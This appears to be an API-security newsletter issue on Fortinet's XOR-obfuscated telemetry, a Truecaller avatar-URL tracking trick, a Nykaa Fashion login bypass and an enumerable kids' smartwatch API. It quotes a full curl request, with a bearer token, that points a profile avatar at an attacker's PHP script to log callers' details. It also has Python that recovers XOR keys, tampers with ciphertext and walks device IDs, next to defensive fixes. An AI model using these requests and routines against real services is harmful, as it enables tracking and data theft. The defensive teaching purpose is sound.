Issue 59: Vulnerabilities in Fortinet, Truecaller, Nykaa Fashion, SMA M2 smartwatch


This week is all about API vulnerabilities. We found them everywhere: from the client-to-cloud communications of Fortinet products, to avatar hacks in the Truecaller app, an authentication flaw in Nykaa Fashion, and yet another kids' smartwatch system with an almost total lack of security.

Vulnerability: Fortinet

Researchers from SEC Consult found poor protocol design in various Fortinet products. Embarrassingly, these are security products, including FortiGuard Web Filter, FortiGuard AntiSpam, and FortiGuard AntiVirus. It turns out that the communication between the local clients and the cloud backend left a lot to be desired.

All of the products rely on UDP and HTTP POST calls to send data from local clients to the cloud service. This data includes, for example:

  • Fortinet serial number
  • Full URLs in browsing history for FortiGuard Web Filter
  • Email data for FortiGuard AntiSpam
  • Unspecified data for FortiGuard AntiVirus

For some reason, instead of using standard encryption protocols, the products simply XORed the data, and with a hard-coded key at that. XOR with a static key is not encryption in any meaningful sense: the same key is baked into every installation, so anyone who recovered it once could decrypt and read the traffic of every customer, and because XOR is malleable (flipping a bit in the ciphertext flips the same bit in the plaintext) they could also modify that traffic in transit without the backend noticing.

Reinventing the wheel in cryptography is a bad idea. Use established protocols such as TLS and their off-the-shelf implementations: you get confidentiality and integrity that have been reviewed by far more people than any home-grown scheme, and the product ends up a lot more secure.
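To make the two failure modes concrete, here is an added example (not Fortinet's or SEC Consult's code) of the XOR-with-static-key pattern. The key, the record layout (a 16-byte serial followed by the browsed URL) and all sample values are constructed for illustration and are not the real FortiGuard wire format. It shows how a passive attacker with one key length of known plaintext recovers the whole key, how an active attacker rewrites the URL without even needing the key, and how a MAC (here HMAC-SHA256 under a constructed per-session key, standing in for what TLS provides) would have caught the forgery.

```python
"""Why XOR with a hard-coded key is not encryption (added example, constructed data)."""
import hashlib
import hmac
from itertools import cycle

STATIC_KEY = b"static-key-16byt"          # constructed 16-byte key baked into every client
SERIAL = b"FGTEXAMPLE000001"              # constructed 16-char serial, printed on the appliance
URL = b"https://news.example/politics"    # constructed browsed URL reported to the cloud
MAC_KEY = b"per-session-mac-key"          # constructed; what a real protocol negotiates per session


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call 'encrypts' and 'decrypts'."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def build_record(serial: bytes, url: bytes) -> bytes:
    """Client -> cloud record: serial padded to 16 bytes, then the URL."""
    return serial.ljust(16, b"\0") + url


def recover_key(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: c XOR p = k wherever p is known. One key length of
    known plaintext (here the serial, readable off the device or guessable by
    format) yields the whole repeating key; extracting it from the client binary
    is the other obvious route."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


def tamper(ciphertext: bytes, offset: int, old: bytes, new: bytes) -> bytes:
    """Malleability: swap a known plaintext substring for another of equal length
    with no key at all, since c' = c XOR old XOR new decrypts to 'new'."""
    if len(old) != len(new):
        raise ValueError("replacement must have the same length")
    out = bytearray(ciphertext)
    for i, (o, n) in enumerate(zip(old, new)):
        out[offset + i] ^= o ^ n
    return bytes(out)


def seal(record: bytes, mac_key: bytes):
    """What the XOR scheme lacks: an integrity tag over the ciphertext."""
    ct = xor_with_key(record, STATIC_KEY)
    return ct, hmac.new(mac_key, ct, hashlib.sha256).digest()


def verify(ct: bytes, tag: bytes, mac_key: bytes) -> bool:
    return hmac.compare_digest(hmac.new(mac_key, ct, hashlib.sha256).digest(), tag)


def demo() -> dict:
    record = build_record(SERIAL, URL)
    ct = xor_with_key(record, STATIC_KEY)
    # 1. passive attacker: 16 known serial bytes give the 16-byte key ...
    key = recover_key(ct, SERIAL)
    # 2. ... which decrypts this and every other appliance's records
    plaintext = xor_with_key(ct, key)
    # 3. active attacker: rewrite the reported URL in transit, key not needed
    offset = 16 + len(b"https://news.example/")
    forged = tamper(ct, offset, b"politics", b"cat-pics")
    seen_by_cloud = xor_with_key(forged, STATIC_KEY)
    # 4. an integrity tag under a key the attacker lacks catches the forgery
    ct2, tag = seal(record, MAC_KEY)
    return {
        "key": key,
        "plaintext": plaintext,
        "seen_by_cloud": seen_by_cloud,
        "mac_ok_untouched": verify(ct2, tag, MAC_KEY),
        "mac_ok_forged": verify(tamper(ct2, offset, b"politics", b"cat-pics"), tag, MAC_KEY),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Step 3 is the part that surprises people: the attacker does not need the key to change what the cloud sees, only to know (or guess) the plaintext at the bytes being rewritten. That is why confidentiality without integrity is not a usable protocol, and why the fix is not a better key but TLS or an AEAD.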

Vulnerability: Truecaller

Ehraz Ahmed had a good week: two API vulnerabilities he had found were disclosed.

The first one is a vulnerability in Truecaller. Truecaller is a mobile app that crowdsources caller ID information. They also have a web application for looking up information on a specific number.

Ahmed found that the Truecaller profile API let him set an arbitrary URL as the avatar image for his number. There was no check that the URL pointed at a particular domain, or even at an image, which left the door open for malicious links. He supplied the URL of a PHP script he controlled instead of a picture, with the following curl request (note the avatarUrl field):

curl -H 'Host: profile4-noneu.truecaller.com' -H 'accept: */*' -H 'content-type: application/json' \
-H 'authorization: Bearer a1i04--GtxQi9FOkBlKqrWwysymvge3xWRT1DdLx5w1DuJ3igycM5_OVL5ClNA_p' \
-H 'user-agent: Truecaller/10.23.11 (com.truesoftware.TrueCallerOther; build:10.23.11; iOS 12.4.0; device:iPhone9,3) Alamofire/4.8.0' \
-H 'accept-language: en-IN;q=1.0, hi-IN;q=0.9' --data-binary '{"personalData":{"address":{"country":"in","street":"",
"city":"","zipCode":""},"gender":"N","privacy":"Public","avatarUrl":"https://ehraz.co/null/evil/pwn.php?x=",
"jobTitle":"","companyName":"","phoneNumbers":[916360366247],"about":"https://ehraz.co","tags":[],
"onlineIds":{"email":"","url":"https://ehraz.co"}},"lastName":"Wong","firstName":"Sum Ting"}' \
--compressed 'https://profile4-noneu.truecaller.com/v4/profile?'

Once this was done, he could start calling his victims from that number. When a victim opened the profile of the number, the Truecaller client fetched the avatar from the stored URL, which made the victim's phone contact the PHP script directly. The script could then log information about the requester (the victim), including the IP address and the client operating system (Android, iOS) and its version.
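The missing control is a server-side check on the avatarUrl at profile-update time. Here is an added example (not Truecaller's code) of such a validator: the stored URL must be an https image on the service's own image host, so a profile view can never make a viewer's phone talk to a third-party server. The host avatars.example.com and the path pattern are assumptions standing in for whatever image host the real service uses; the rejected inputs in the usage below are constructed, apart from the URL from Ahmed's request.

```python
"""Server-side validation of a user-supplied avatar URL (added example)."""
import re
from typing import Tuple
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"avatars.example.com"}   # assumption: the service's own image CDN
# Image object path: safe-character segments and exactly one image extension.
# Dots are allowed nowhere else, which rules out "/../" traversal and "x.php".
IMAGE_PATH = re.compile(r"^/[A-Za-z0-9_\-/]+\.(?:png|jpe?g|webp|gif)$")
MAX_LEN = 2048


def validate_avatar_url(url) -> Tuple[bool, str]:
    """Return (accepted, reason). Only 'https://<allowed host>/<image path>' passes."""
    if not isinstance(url, str) or not url or len(url) > MAX_LEN:
        return False, "type/length"
    if any(ch.isspace() or ord(ch) < 0x20 for ch in url):
        return False, "whitespace/control"
    try:
        parts = urlsplit(url)
        port = parts.port                     # raises ValueError on 'host:abc'
    except ValueError:
        return False, "unparseable"
    if parts.scheme.lower() != "https":       # also rejects 'http://' and '//host/...'
        return False, "scheme"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo"              # 'https://good.host@evil.host/' trick
    if (parts.hostname or "").lower() not in ALLOWED_HOSTS:
        return False, "host"                  # exact match: 'good.host.evil.host' fails too
    if port not in (None, 443):
        return False, "port"
    if parts.query or parts.fragment:
        return False, "query/fragment"        # no attacker-controlled parameters
    if not IMAGE_PATH.match(parts.path):
        return False, "path"
    return True, "ok"


def update_profile(profile: dict, incoming: dict) -> dict:
    """Apply a profile update; an avatarUrl that fails validation is dropped and
    the previously stored (already validated) value is kept."""
    merged = {**profile, **incoming}
    if "avatarUrl" in incoming:
        accepted, reason = validate_avatar_url(incoming["avatarUrl"])
        if not accepted:
            merged["avatarUrl"] = profile.get("avatarUrl")
            merged["rejected"] = f"avatarUrl: {reason}"
    return merged


if __name__ == "__main__":
    # The URL from the request above, plus constructed variants of common bypasses.
    for candidate in [
        "https://ehraz.co/null/evil/pwn.php?x=",
        "https://avatars.example.com/u/916360366247/a1b2.png",
        "https://avatars.example.com@ehraz.co/x.png",
        "https://avatars.example.com.ehraz.co/x.png",
        "//avatars.example.com/x.png",
        "https://avatars.example.com/../x.png",
    ]:
        print(candidate, "->", validate_avatar_url(candidate))
```

Restricting the host to the service's own image store is the whole point: even a URL on a legitimate third-party host would still leak each viewer's IP address and user agent to that host. The usual design is for the server to fetch or accept the upload, store it on its own CDN, and persist only that CDN URL, which is exactly what this allowlist enforces.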

Vulnerability: Nykaa Fashion

The other vulnerability that Ahmed found was in a popular Indian beauty and fashion retailer, Nykaa Fashion. With a customer base of about a million, the potential impact of the vulnerability would have been considerable.

Unfortunately, details of the actual vulnerability are scant. The description points to an authentication bypass in an internal API:

"One of their Internal APIs can log you into any Nykaa Fashion account, bypassing your Email Address into the request, and in response, it returns with the Access Token […]

Hackers and Telemarketers can mine the data…(of approximately a million users) by automating a script using a phone number dump found online"

Our advice is to use standard authentication protocols and their off-the-shelf implementations, and never to issue an access token on the strength of an identifier alone: an email address or phone number is a username, not a credential. "Internal" APIs need exactly the same authentication and authorization checks as public ones, because an endpoint that is reachable is public whatever it is called. For administrative access, use roles and groups, and ensure that any administrative functions have authorization checks in place.

Vulnerability: SMA M2 Kids Smartwatch

Unfortunately, API vulnerabilities in children's GPS smartwatches are extremely common. We have already covered several of them in issues 7, 18, 19, and 26.

This week, the IoT laboratory of the AV-TEST Institute found glaring security holes in the APIs of the SMA-WATCH-M2 kids' smartwatch, manufactured by the Chinese company Shenzhen Smart Care Technology Ltd.

As with other similar products, parents control the watch through a smartphone app and a cloud service, and the communication goes through REST APIs over the public internet.

The following API security issues were reported:

  • Although the API requires an authentication token to be present, the token is never actually verified, so any value is accepted and the API is effectively wide open.
  • The API identifies devices by predictable IDs that can be enumerated, so a simple brute-force walk over the ID space finds every device in use.

As a result, the researchers found more than 5,000 smartwatches in use. For each of them, they could:

  • Find all information that parents had entered in the profile (names, addresses, pictures, phone numbers…)
  • Get the current GPS coordinates of the device
  • Perform actions, such as calling or messaging the device

Scary stuff. We can only agree with the researchers that a device like this puts children in danger instead of protecting them.
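The Nykaa and SMA-WATCH-M2 reports are two ends of the same token lifecycle going wrong: one service handed out access tokens on the strength of an email address, the other accepted any token at all and then served devices by enumerable ID. The following added example (not Nykaa Fashion's or Shenzhen Smart Care's code) models both failures next to a hardened version: credential-checked issuance, signature-and-expiry verification, and an ownership check per device so that a valid token for one parent cannot be walked over other people's children. The signing key, users, passwords, device IDs and coordinates are all constructed.

```python
"""Token issuance, verification and per-object authorization (added example)."""
import base64
import binascii
import hashlib
import hmac
import json
import time

SERVER_KEY = b"constructed-signing-key"   # constructed; a real service loads this from a secret store

# Constructed data. Passwords are stored as plain SHA-256 only to keep the example
# short; real code uses a password hash such as argon2id or bcrypt.
USERS = {
    "parent@example.com": {"pw": hashlib.sha256(b"correct horse").hexdigest(), "devices": {1001}},
    "aunt@example.com":   {"pw": hashlib.sha256(b"battery staple").hexdigest(), "devices": {1002, 1003}},
}
DEVICES = {                               # sequential IDs, as on the smartwatch backend
    1001: {"child": "A.", "lat": 52.52, "lon": 13.40},
    1002: {"child": "B.", "lat": 48.14, "lon": 11.58},
    1003: {"child": "C.", "lat": 50.11, "lon": 8.68},
}


def _now(now):
    return time.time() if now is None else now


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_token(subject: str, now=None) -> str:
    """HMAC-SHA256 signed 'payload.tag' token with one hour of validity."""
    payload = json.dumps({"sub": subject, "exp": int(_now(now) + 3600)},
                         separators=(",", ":")).encode()
    tag = hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()
    return f"{_b64(payload)}.{_b64(tag)}"


def verify_token(token, now=None):
    """Return the subject if signature and expiry check out, else None."""
    if not isinstance(token, str) or token.count(".") != 1:
        return None
    try:
        payload, tag = (_unb64(part) for part in token.split("."))
    except (binascii.Error, ValueError):
        return None
    expected = hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None
    claims = json.loads(payload)            # safe to parse: the signature proves we produced it
    if claims.get("exp", 0) < _now(now):
        return None
    return claims.get("sub")


# --- Nykaa-style failure: the identifier alone is treated as proof of identity ---
def login_insecure(email: str):
    return mint_token(email) if email in USERS else None


# --- hardened: demand a credential; same answer for unknown user and wrong password ---
def login(email: str, password: str):
    user = USERS.get(email)
    supplied = hashlib.sha256(password.encode()).hexdigest()
    stored = user["pw"] if user else supplied      # still do a comparison for unknown users
    if user is None or not hmac.compare_digest(supplied, stored):
        return None
    return mint_token(email)


# --- smartwatch-style failure: a token must be present, but anything is accepted ---
def get_device_insecure(token, device_id: int):
    if not token:
        return {"error": "unauthorized"}
    return DEVICES.get(device_id, {"error": "not found"})


# --- hardened: verify the token, then check the caller owns this particular device ---
def get_device(token, device_id: int, now=None):
    subject = verify_token(token, now)
    if subject is None:
        return {"error": "unauthorized"}
    owned = USERS.get(subject, {}).get("devices", set())
    if device_id not in owned:
        return {"error": "not found"}              # same as nonexistent: no existence oracle
    return DEVICES[device_id]


def enumerate_devices(handler, token, id_range) -> dict:
    """What the AV-TEST scan amounts to: walk the ID space and keep the hits."""
    found = {}
    for device_id in id_range:
        result = handler(token, device_id)
        if "error" not in result:
            found[device_id] = result
    return found


if __name__ == "__main__":
    print("insecure, junk token:", enumerate_devices(get_device_insecure, "junk", range(1000, 1010)))
    print("hardened, junk token:", enumerate_devices(get_device, "junk", range(1000, 1010)))
    token = login("parent@example.com", "correct horse")
    print("hardened, parent's token:", enumerate_devices(get_device, token, range(1000, 1010)))
```

Two details matter in the hardened path. The ownership check in get_device returns the same "not found" for a device the caller does not own as for a device that does not exist, so the ID space cannot be mapped even with a valid token. And login compares a hash even when the email is unknown, so the response does not reveal which addresses from a leaked phone or email dump are registered.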

